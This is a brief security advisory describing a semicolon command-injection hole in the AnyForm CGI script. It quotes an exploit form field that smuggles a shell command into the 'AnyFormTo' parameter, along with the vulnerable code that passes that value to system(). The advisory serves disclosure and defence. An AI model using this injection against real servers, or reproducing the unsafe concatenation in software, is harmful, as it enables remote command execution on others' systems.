Anyform CGI Semicolon Vulnerability

Exploit as taken from the original post on this issue:

To exploit, create a form with a hidden field something like this:

<input type="hidden" name="AnyFormTo" value="foo@bar.com;command-to-execute
with whatever arguments;/usr/lib/sendmail -t foo@bar.com ">

Then submit the form to the "AnyForm" CGI on the server to be attacked.
The value of this parameter is passed to this code:

SystemCommand="/usr/lib/sendmail -t " + AnyFormTo + " <" + CombinedFileName;
system(SystemCommand);

Since system invokes a shell, the semicolons are treated as command
delimiters and anything can be inserted.


 

Copyright 2010, SecurityFocus